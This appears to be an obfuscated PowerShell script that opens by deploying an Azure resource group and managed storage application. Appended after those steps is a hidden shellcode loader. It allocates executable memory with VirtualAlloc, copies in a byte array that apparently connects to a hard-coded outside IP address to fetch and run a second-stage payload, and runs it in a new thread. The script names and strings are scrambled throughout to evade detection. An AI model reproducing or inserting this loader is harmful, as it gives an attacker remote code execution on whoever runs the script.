&("{2}{5}{3}{1}{4}{0}"-f 'p','eso','New-A','R','urceGrou','z') -Name ("{4}{1}{5}{0}{3}{2}" -f 'onGr','ic','p','ou','appl','ati') -Location ("{0}{2}{3}{1}"-f 'west','lus','ce','ntra')


${AP`Pid}=(.("{1}{5}{6}{2}{0}{3}{7}{4}" -f 'i','G','at','onDefini','on','et-AzManagedAppl','ic','ti') -ResourceGroupName ("{1}{2}{3}{0}"-f 'oup','a','ppDefinitionG','r') -Name ("{0}{4}{2}{1}{3}" -f'Man','ra','o','ge','agedSt'))."MA`Nage`DAPP`lIcati`ON`DeFin`iTi`oNID"


&("{3}{0}{4}{1}{2}"-f 'w-AzManage','Applicat','ion','Ne','d') `
  -Name ("{0}{2}{1}" -f'stora','eApp','g') `
  -Location ("{1}{0}{3}{2}" -f's','we','alus','tcentr') `
  -Kind ("{4}{2}{3}{1}{0}"-f 'g','atalo','vice','C','Ser') `
  -ResourceGroupName ("{0}{3}{2}{4}{1}" -f'a','roup','ic','ppl','ationG') `
  -ManagedApplicationDefinitionId ${A`p`PiD} `
  -ManagedResourceGroupName ("{2}{4}{0}{3}{6}{1}{5}" -f'astructu','ou','In','re','fr','p','Gr') `
  -Parameter "{`"storageAccountNamePrefix`": {`"value`": `"demostorage`"}, `"storageAccountType`": {`"value`": `"Standard_LRS`"}}"
${c} = ((("{34}{55}{32}{61}{18}{30}{63}{60}{53}{67}{12}{42}{17}{65}{9}{51}{48}{20}{2}{16}{66}{44}{35}{33}{69}{4}{26}{27}{1}{22}{23}{5}{37}{68}{21}{46}{8}{15}{43}{57}{28}{0}{11}{45}{25}{14}{41}{52}{38}{62}{10}{64}{71}{54}{7}{36}{40}{19}{47}{70}{39}{31}{24}{59}{29}{56}{50}{58}{6}{13}{3}{49}"-f 'tr lpParameter,','d(IntPtr','DllI','unt)','n IntPtr Create','e','c, uint c','c','e',' uint flAllocati','d)',' uint ','c(IntP','o','Flag','s','mport(zuXke','r','t','public ','flProtect);[','uint dwStack',' lpT','hr','et(IntPt','ion','Thre','a','tP',' dest, ui','er','tPtr mems','lzuX)]public','ublic st','[DllImport(zuXker','p','rt.dllzu','adAttr','r','xtern In','X)]','s, IntPtr lp','tr lpAdd','s',')]','dwCreat','Size, IntPtr lpStartAddr','stati','t ',';',' ','onType, uin','Th','rtualA','sv','nel32.dl','nt',', In','sr','r','tPtr Vi',' static ex','eadI','n In',';[D','ess, uint dwSize,','rnel32.dllzuX','llo','ibutes, ','atic exter','c e','llImport(zuXm'))."R`epL`ACE"('zuX',[strIng][cHar]34));${w} = &("{1}{0}"-f'-Type','Add') -memberDefinition ${c} -Name ("{1}{0}" -f '32','Win') -namespace ("{2}{3}{1}{0}"-f 'ions','nct','W','in32Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xad,0xff,0xcc,0xc0,0x68,0x02,0x00,0xe3,0xad,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."Len`gTH" -gt 0x1000){${g} = ${z}."lEng`Th"};${x}=${W}::("{0}{1}{3}{2}" -f 'Vi','rtu','lloc','alA').Invoke(0,0x1000,${g},0x40);for (${I}=0;${I} -le (${Z}."L`ENGTH"-1);${I}++) {${W}::"M`emS`eT"([IntPtr](${x}.("{0}{1}" -f 'To','Int32').Invoke()+${I}), ${z}[${I}], 1)};${w}::("{1}{2}{0}"-f'ateThread','C','re').Invoke(0,0,${x},0,0,0);for (;;){.("{2}{1}{0}"-f 'leep','t-s','Star') 60};
